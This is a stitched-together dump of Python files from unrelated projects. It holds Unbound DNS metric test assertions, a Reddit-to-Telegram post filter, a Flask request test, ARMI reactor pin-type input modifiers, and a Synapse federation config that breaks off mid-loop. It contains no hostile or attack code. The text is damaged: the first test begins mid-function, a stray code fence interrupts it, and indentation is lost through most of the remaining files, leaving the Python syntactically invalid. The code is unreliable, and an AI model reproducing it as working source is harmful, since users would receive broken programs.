    aggregator.assert_metric('unbound.thread.num.queries', value=204240518, tags=thread_tags,
                             count=1, hostname=None, metric_type=aggregator.COUNT)
    aggregator.assert_metric('unbound.thread.num.cachehits', value=190406406, tags=thread_tags,
                             count=1, hostname=None, metric_type=aggregator.COUNT)
    aggregator.assert_metric('unbound.thread.num.cachemiss', value=13834112, tags=thread_tags,
                             count=1, hostname=None, metric_type=aggregator.COUNT)
    aggregator.assert_metric('unbound.thread.num.prefetch', value=0, tags=thread_tags,
                             count=1, hostname=None, metric_type=aggregator.COUNT)
    aggregator.assert_metric('unbound.thread.num.recursivereplies', value=13834112, tags=thread_tags,
                             count=1, hostname=None, metric_type=aggregator.COUNT)
    aggregator.assert_metric('unbound.thread.requestlist.avg', value=0.272588, tags=thread_tags,
                             count=1, hostname=None, metric_type=aggregator.GAUGE)
    aggregator.assert_metric('unbound.thread.requestlist.max', value=14, tags=thread_tags,
                             count=1, hostname=None, metric_type=aggregator.GAUGE)
    aggregator.assert_metric('unbound.thread.requestlist.overwritten', value=0, tags=thread_tags,
                             count=1, hostname=None, metric_type=aggregator.GAUGE)
    aggregator.assert_metric('unbound.thread.requestlist.exceeded', value=0, tags=thread_tags,
                             count=1, hostname=None, metric_type=aggregator.GAUGE)
    aggregator.assert_metric('unbound.thread.requestlist.current.all', value=0, tags=thread_tags,
                             count=1, hostname=None, metric_type=aggregator.GAUGE)
    aggregator.assert_metric('unbound.thread.requestlist.current.user', value=0, tags=thread_tags,
                             count=1, hostname=None, metric_type=aggregator.GAUGE)
    aggregator.assert_metric('unbound.thread.recursion.time.avg', value=0.005766, tags=thread_tags,
                             count=1, hostname=None, metric_type=aggregator.GAUGE)
    aggregator.assert_metric('unbound.thread.recursion.time.median', value=0.00165754, tags=thread_tags,
                             count=1, hostname=None, metric_type=aggregator.GAUGE)

    aggregator.assert_metric('unbound.total.num.queries', value=204240518, tags=tags,
                             count=1, hostname=None, metric_type=aggregator.COUNT)
    aggregator.assert_metric('unbound.total.num.cachehits', value=190406406, tags=tags,
                             count=1, hostname=None, metric_type=aggregator.COUNT)
    aggregator.assert_metric('unbound.total.num.cachemiss', value=13834112, tags=tags,
                             count=1, hostname=None, metric_type=aggregator.COUNT)
    aggregator.assert_metric('unbound.total.num.prefetch', value=0, tags=tags,
                             count=1, hostname=None, metric_type=aggregator.COUNT)
    aggregator.assert_metric('unbound.total.num.recursivereplies', value=13834112, tags=tags,
                             count=1, hostname=None, metric_type=aggregator.COUNT)
    aggregator.assert_metric('unbound.total.requestlist.avg', value=0.272588, tags=tags,
                             count=1, hostname=None, metric_type=aggregator.GAUGE)
    aggregator.assert_metric('unbound.total.requestlist.max', value=14, tags=tags,
                             count=1, hostname=None, metric_type=aggregator.GAUGE)
    aggregator.assert_metric('unbound.total.requestlist.overwritten', value=0, tags=tags,
                             count=1, hostname=None, metric_type=aggregator.GAUGE)
    aggregator.assert_metric('unbound.total.requestlist.exceeded', value=0, tags=tags,
                             count=1, hostname=None, metric_type=aggregator.GAUGE)
    aggregator.assert_metric('unbound.total.requestlist.current.all', value=0, tags=tags,
                             count=1, hostname=None, metric_type=aggregator.GAUGE)
    aggregator.assert_metric('unbound.total.requestlist.current.user', value=0, tags=tags,
                             count=1, hostname=None, metric_type=aggregator.GAUGE)
    aggregator.assert_metric('unbound.total.recursion.time.avg', value=0.005766, tags=tags,
                             count=1, hostname=None, metric_type=aggregator.GAUGE)
    aggregator.assert_metric('unbound.total.recursion.time.median', value=0.00165754, tags=tags,
                             count=1, hostname=None, metric_type=aggregator.GAUGE)
    aggregator.assert_metric('unbound.time.now', value=1558634276.538588, tags=tags,
                             count=1, hostname=None, metric_type=aggregator.GAUGE)
    aggregator.assert_metric('unbound.time.up', value=56320542.076365, tags=tags,
                             count=1, hostname=None, metric_type=aggregator.GAUGE)
    aggregator.assert_metric('unbound.time.elapsed', value=56320542.076365, tags=tags,
                             count=1, hostname=None, metric_type=aggregator.GAUGE)

    # extended stats start here
    aggregator.assert_metric('unbound.mem.total.sbrk', value=10919936, tags=tags,
                             count=1, hostname=None, metric_type=aggregator.GAUGE)
    aggregator.assert_metric('unbound.mem.cache.rrset', value=249585, tags=tags,
                             count=1, hostname=None, metric_type=aggregator.GAUGE)
    aggregator.assert_metric('unbound.mem.cache.message', value=618825, tags=tags,
                             count=1, hostname=None, metric_type=aggregator.GAUGE)
    aggregator.assert_metric('unbound.mem.mod.iterator', value=16532, tags=tags,
                             count=1, hostname=None, metric_type=aggregator.GAUGE)
    aggregator.assert_metric('unbound.mem.mod.validator', value=66344, tags=tags,
                             count=1, hostname=None, metric_type=aggregator.GAUGE)
    aggregator.assert_metric('unbound.num.query.type', value=63589866, tags=tags + ['query_type:A'],
                             count=1, hostname=None, metric_type=aggregator.COUNT)
    aggregator.assert_metric('unbound.num.query.type', value=30, tags=tags + ['query_type:CNAME'],
```
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.num.query.type',
value=2436,
tags=tags + ['query_type:PTR'],
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.num.query.type',
value=133376595,
tags=tags + ['query_type:AAAA'],
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.num.query.type',
value=7271591,
tags=tags + ['query_type:SRV'],
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.num.query.class',
value=204240518,
tags=tags + ['query_class:IN'],
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.num.query.opcode',
value=204240518,
tags=tags + ['opcode:QUERY'],
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.num.query.tcp', value=0, tags=tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.num.query.ipv6', value=0, tags=tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.num.query.flags',
value=0,
tags=tags + ['flag:QR'],
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.num.query.flags',
value=0,
tags=tags + ['flag:AA'],
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.num.query.flags',
value=0,
tags=tags + ['flag:TC'],
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.num.query.flags',
value=204240518,
tags=tags + ['flag:RD'],
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.num.query.flags',
value=0,
tags=tags + ['flag:RA'],
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.num.query.flags', value=0, tags=tags + ['flag:Z'], count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.num.query.flags',
value=0,
tags=tags + ['flag:AD'],
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.num.query.flags',
value=0,
tags=tags + ['flag:CD'],
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.num.query.edns.present', value=187, tags=tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.num.query.edns.DO', value=0, tags=tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.num.answer.rcode',
value=112675648,
tags=tags + ['rcode:NOERROR'],
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.num.answer.rcode',
value=18863,
tags=tags + ['rcode:SERVFAIL'],
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.num.answer.rcode',
value=91546007,
tags=tags + ['rcode:NXDOMAIN'],
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.num.answer.rcode.nodata',
value=48630830,
tags=tags,
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.num.answer.secure', value=0, tags=tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.num.answer.bogus', value=0, tags=tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.num.rrset.bogus', value=0, tags=tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.unwanted.queries', value=0, tags=tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.unwanted.replies', value=5, tags=tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
def assert_extended_stats_1_9_2(aggregator, tags):
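    """Assert per-thread stats (threads 0-2), totals, time metrics, and extended stats for the 1.9.2 fixture."""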
thread0_tags = tags + ['thread:0']
aggregator.assert_metric(
'unbound.thread.num.queries', value=3, tags=thread0_tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.thread.num.queries_ip_ratelimited',
value=0,
tags=thread0_tags,
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.thread.num.cachehits', value=3, tags=thread0_tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.thread.num.cachemiss', value=0, tags=thread0_tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.thread.num.prefetch', value=0, tags=thread0_tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.thread.num.zero_ttl', value=0, tags=thread0_tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.thread.num.recursivereplies',
value=0,
tags=thread0_tags,
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.thread.requestlist.avg',
value=0,
tags=thread0_tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.thread.requestlist.max',
value=0,
tags=thread0_tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.thread.requestlist.overwritten',
value=0,
tags=thread0_tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.thread.requestlist.exceeded',
value=0,
tags=thread0_tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.thread.requestlist.current.all',
value=0,
tags=thread0_tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.thread.requestlist.current.user',
value=0,
tags=thread0_tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.thread.recursion.time.avg',
value=0,
tags=thread0_tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.thread.recursion.time.median',
value=0,
tags=thread0_tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.thread.tcpusage', value=0, tags=thread0_tags, count=1, hostname=None, metric_type=aggregator.GAUGE
)
thread1_tags = tags + ['thread:1']
aggregator.assert_metric(
'unbound.thread.num.queries', value=1, tags=thread1_tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.thread.num.cachehits', value=0, tags=thread1_tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.thread.num.cachemiss', value=1, tags=thread1_tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.thread.num.prefetch', value=0, tags=thread1_tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.thread.num.zero_ttl', value=0, tags=thread1_tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.thread.num.recursivereplies',
value=1,
tags=thread1_tags,
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.thread.requestlist.avg',
value=0,
tags=thread1_tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.thread.requestlist.max',
value=0,
tags=thread1_tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.thread.requestlist.overwritten',
value=0,
tags=thread1_tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.thread.requestlist.exceeded',
value=0,
tags=thread1_tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.thread.requestlist.current.all',
value=0,
tags=thread1_tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.thread.requestlist.current.user',
value=0,
tags=thread1_tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.thread.recursion.time.avg',
value=0.416939,
tags=thread1_tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.thread.recursion.time.median',
value=0,
tags=thread1_tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.thread.tcpusage', value=0, tags=thread1_tags, count=1, hostname=None, metric_type=aggregator.GAUGE
)
thread2_tags = tags + ['thread:2']
aggregator.assert_metric(
'unbound.thread.num.queries', value=1, tags=thread2_tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.thread.num.cachehits', value=1, tags=thread2_tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.thread.num.cachemiss', value=0, tags=thread2_tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.thread.num.prefetch', value=0, tags=thread2_tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.thread.num.zero_ttl', value=0, tags=thread2_tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.thread.num.recursivereplies',
value=0,
tags=thread2_tags,
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.thread.requestlist.avg',
value=0,
tags=thread2_tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.thread.requestlist.max',
value=0,
tags=thread2_tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.thread.requestlist.overwritten',
value=0,
tags=thread2_tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.thread.requestlist.exceeded',
value=0,
tags=thread2_tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.thread.requestlist.current.all',
value=0,
tags=thread2_tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.thread.requestlist.current.user',
value=0,
tags=thread2_tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.thread.recursion.time.avg',
value=0,
tags=thread2_tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.thread.recursion.time.median',
value=0,
tags=thread2_tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.thread.tcpusage', value=0, tags=thread2_tags, count=1, hostname=None, metric_type=aggregator.GAUGE
)
aggregator.assert_metric(
'unbound.total.num.queries', value=5, tags=tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.total.num.queries_ip_ratelimited',
value=0,
tags=tags,
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.total.num.cachehits', value=4, tags=tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.total.num.cachemiss', value=1, tags=tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.total.num.prefetch', value=0, tags=tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.total.num.zero_ttl', value=0, tags=tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.total.num.recursivereplies', value=1, tags=tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.total.requestlist.avg', value=0, tags=tags, count=1, hostname=None, metric_type=aggregator.GAUGE
)
aggregator.assert_metric(
'unbound.total.requestlist.max', value=0, tags=tags, count=1, hostname=None, metric_type=aggregator.GAUGE
)
aggregator.assert_metric(
'unbound.total.requestlist.overwritten',
value=0,
tags=tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.total.requestlist.exceeded', value=0, tags=tags, count=1, hostname=None, metric_type=aggregator.GAUGE
)
aggregator.assert_metric(
'unbound.total.requestlist.current.all',
value=0,
tags=tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.total.requestlist.current.user',
value=0,
tags=tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.total.recursion.time.avg',
value=0.416939,
tags=tags,
count=1,
hostname=None,
metric_type=aggregator.GAUGE,
)
aggregator.assert_metric(
'unbound.total.recursion.time.median', value=0, tags=tags, count=1, hostname=None, metric_type=aggregator.GAUGE
)
aggregator.assert_metric(
'unbound.total.tcpusage', value=0, tags=tags, count=1, hostname=None, metric_type=aggregator.GAUGE
)
aggregator.assert_metric(
'unbound.time.now', value=1561494094.953120, tags=tags, count=1, hostname=None, metric_type=aggregator.GAUGE
)
aggregator.assert_metric(
'unbound.time.up', value=26.067263, tags=tags, count=1, hostname=None, metric_type=aggregator.GAUGE
)
aggregator.assert_metric(
'unbound.time.elapsed', value=26.067263, tags=tags, count=1, hostname=None, metric_type=aggregator.GAUGE
)
# extended stats start here
aggregator.assert_metric(
'unbound.mem.cache.rrset', value=71423, tags=tags, count=1, hostname=None, metric_type=aggregator.GAUGE
)
aggregator.assert_metric(
'unbound.mem.cache.message', value=67845, tags=tags, count=1, hostname=None, metric_type=aggregator.GAUGE
)
aggregator.assert_metric(
'unbound.mem.mod.iterator', value=16588, tags=tags, count=1, hostname=None, metric_type=aggregator.GAUGE
)
aggregator.assert_metric(
'unbound.mem.mod.validator', value=69288, tags=tags, count=1, hostname=None, metric_type=aggregator.GAUGE
)
aggregator.assert_metric(
'unbound.mem.mod.respip', value=0, tags=tags, count=1, hostname=None, metric_type=aggregator.GAUGE
)
aggregator.assert_metric(
'unbound.mem.streamwait', value=0, tags=tags, count=1, hostname=None, metric_type=aggregator.GAUGE
)
aggregator.assert_metric(
'unbound.num.query.type',
value=5,
tags=tags + ['query_type:A'],
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.num.query.class',
value=5,
tags=tags + ['query_class:IN'],
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.num.query.opcode',
value=5,
tags=tags + ['opcode:QUERY'],
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.num.query.tcp', value=0, tags=tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.num.query.tcpout', value=7, tags=tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.num.query.tls', value=0, tags=tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.num.query.tls.resume', value=0, tags=tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.num.query.ipv6', value=0, tags=tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.num.query.flags',
value=0,
tags=tags + ['flag:QR'],
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.num.query.flags',
value=0,
tags=tags + ['flag:AA'],
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.num.query.flags',
value=0,
tags=tags + ['flag:TC'],
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.num.query.flags',
value=5,
tags=tags + ['flag:RD'],
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.num.query.flags',
value=0,
tags=tags + ['flag:RA'],
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.num.query.flags', value=0, tags=tags + ['flag:Z'], count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.num.query.flags',
value=0,
tags=tags + ['flag:AD'],
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.num.query.flags',
value=0,
tags=tags + ['flag:CD'],
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.num.query.edns.present', value=0, tags=tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.num.query.edns.DO', value=0, tags=tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.num.answer.rcode',
value=5,
tags=tags + ['rcode:NOERROR'],
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.num.answer.rcode',
value=0,
tags=tags + ['rcode:FORMERR'],
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.num.answer.rcode',
value=0,
tags=tags + ['rcode:SERVFAIL'],
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.num.answer.rcode',
value=0,
tags=tags + ['rcode:NXDOMAIN'],
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.num.answer.rcode',
value=0,
tags=tags + ['rcode:NOTIMPL'],
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.num.answer.rcode',
value=0,
tags=tags + ['rcode:REFUSED'],
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.num.query.ratelimited', value=0, tags=tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.num.answer.secure', value=5, tags=tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.num.answer.bogus', value=0, tags=tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.num.rrset.bogus', value=0, tags=tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.num.query.aggressive.NOERROR', value=0, tags=tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.num.query.aggressive.NXDOMAIN',
value=0,
tags=tags,
count=1,
hostname=None,
metric_type=aggregator.COUNT,
)
aggregator.assert_metric(
'unbound.unwanted.queries', value=0, tags=tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.unwanted.replies', value=0, tags=tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.msg.cache.count', value=7, tags=tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.rrset.cache.count', value=8, tags=tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.infra.cache.count', value=3, tags=tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.key.cache.count', value=3, tags=tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.num.query.authzone.up', value=0, tags=tags, count=1, hostname=None, metric_type=aggregator.COUNT
)
aggregator.assert_metric(
'unbound.num.query.authzone.down', value=0, tags=tags, count=1, hostname=None, metric_type=aggregator.COUNT
)

# ---- /reddit2telegram/channels/rlebanon/app.py | repo: Fillll/reddit2telegram | license: MIT ----

#encoding:utf-8
from utils import SupplyResult
subreddit = 'lebanon'
t_channel = '@RLebanon'
def send_post(submission, r2t):
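    # Only forward submissions with at least 40 comments or a score of 50+.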
if len(submission.comments.list()) < 40 and submission.score < 50:
return SupplyResult.DO_NOT_WANT_THIS_SUBMISSION
return r2t.send_simple(submission)

# ---- /tests/test_flask/test_g.py | repo: Eastwu5788/pre-request | license: MIT ----

# !/usr/local/python/bin/python
# -*- coding: utf-8 -*-
# (C) Wu Dong, 2020
# All rights reserved
# @Author: 'Wu Dong <wudong@eastwu.cn>'
# @Time: '2020-04-20 10:08'
class TestG:
def test_g_smoke(self, client):
""" 测试通过flask g获取请求参数
"""
resp = client.get("/g", data={
"email": "wudong@eastwu.cn"
})
assert resp.json == {"email": "wudong@eastwu.cn"}

# ---- /armi/cases/inputModifiers/pinTypeInputModifiers.py | repo: terrapower/armi | license: Apache-2.0 ----

# Copyright 2019 TerraPower, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from armi.cases.inputModifiers import inputModifiers
from armi.reactor import flags
from armi.reactor.components import component
from armi.reactor.converters import pinTypeBlockConverters
class _PinTypeAssemblyModifier(inputModifiers.InputModifier):
"""
Abstract class for modifying something about a pin, within a block.
This will construct blocks, determine if the block should be modified by checking
the ``_getBlockTypesToModify``, and then run ``_adjustBlock(b)``. The ``Blueprints``
are then updated based on the modification assuming that dimension names match
    exactly to ComponentBlueprint attributes (which is true, because ComponentBlueprint
attributes are programmatically derived from Component constructors).
"""
def __init__(self, value):
inputModifiers.InputModifier.__init__(self, {self.__class__.__name__: value})
self.value = value
def __call__(self, cs, bp, geom):
for bDesign in bp.blockDesigns:
# bDesign construct requires lots of arguments, many of which have no impact.
# The following can safely be defaulted to meaningless inputs:
# axialIndex: a block can be reused at any axial index, modifications made
# dependent on will not translate back to the input in a meaningful
# fashion
# axialMeshPoints: similar to above, this is specified by the assembly, and
# a block can be within any section of an assembly.
# height: similar to above. a block can have any height specified by an
# assembly. if height-specific modifications are required, then a new
# block definition should be created in the input
# xsType: similar to above. a block can have any xsType specified through
# the assembly definition assembly. if xsType-specific modifications are
# required, then a new block definition should be created in the input
# materialInput: this is the materialModifications from the assembly
# definition. if material modifications are required on a block-specific
# basis, they should be edited directly
b = bDesign.construct(
cs,
bp,
axialIndex=1,
axialMeshPoints=1,
height=1,
xsType="A",
materialInput={},
)
if not b.hasFlags(self._getBlockTypesToModify()):
continue
self._adjustBlock(b)
for cDesign, c in zip(bDesign, b):
for dimName in c.DIMENSION_NAMES:
inpDim = getattr(cDesign, dimName)
newDim = getattr(c.p, dimName)
if isinstance(newDim, tuple):
# map linked component dimension
link = component._DimensionLink(newDim)
newDim = str(link)
if inpDim != newDim:
setattr(cDesign, dimName, newDim)
return cs, bp, geom
def _getBlockTypesToModify(self):
"""Hook method to determine blocks that should be modified."""
raise NotImplementedError
def _adjustBlock(self, b):
"""Hook method for `__call__` template method."""
raise NotImplementedError
class SmearDensityModifier(_PinTypeAssemblyModifier):
"""
Adjust the smeared density to the specified value.
This is effectively how much of the space inside the cladding tube is occupied by
fuel at fabrication.
"""
def _getBlockTypesToModify(self):
"""Hook method to determine blocks that should be modified."""
return flags.Flags.FUEL
def _adjustBlock(self, b):
"""Hook method for `__call__` template method."""
pinTypeBlockConverters.adjustSmearDensity(b, self.value)
class CladThicknessByODModifier(_PinTypeAssemblyModifier):
"""Adjust the cladding thickness by adjusting the inner diameter of all cladding components."""
FAIL_IF_AFTER = (SmearDensityModifier,)
def _getBlockTypesToModify(self):
"""Hook method to determine blocks that should be modified."""
return ""
def _adjustBlock(self, b):
pinTypeBlockConverters.adjustCladThicknessByOD(b, self.value)
class CladThicknessByIDModifier(_PinTypeAssemblyModifier):
"""Adjust the cladding thickness by adjusting the outer diameter of the cladding component."""
FAIL_IF_AFTER = (SmearDensityModifier,)
def _getBlockTypesToModify(self):
"""Hook method to determine blocks that should be modified."""
return ""
def _adjustBlock(self, b):
pinTypeBlockConverters.adjustCladThicknessByID(b, self.value)

# ---- /synapse/config/federation.py | repo: matrix-org/synapse | license: Apache-2.0 ----

|
# Copyright 2020 The Matrix.org Foundation C.I.C.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import Any, Optional
from synapse.config._base import Config
from synapse.config._util import validate_config
from synapse.types import JsonDict
class FederationConfig(Config):
section = "federation"
def read_config(self, config: JsonDict, **kwargs: Any) -> None:
federation_config = config.setdefault("federation", {})
# FIXME: federation_domain_whitelist needs sytests
self.federation_domain_whitelist: Optional[dict] = None
federation_domain_whitelist = config.get("federation_domain_whitelist", None)
if federation_domain_whitelist is not None:
# turn the whitelist into a hash for speed of lookup
self.federation_domain_whitelist = {}
for domain in federation_domain_whitelist:
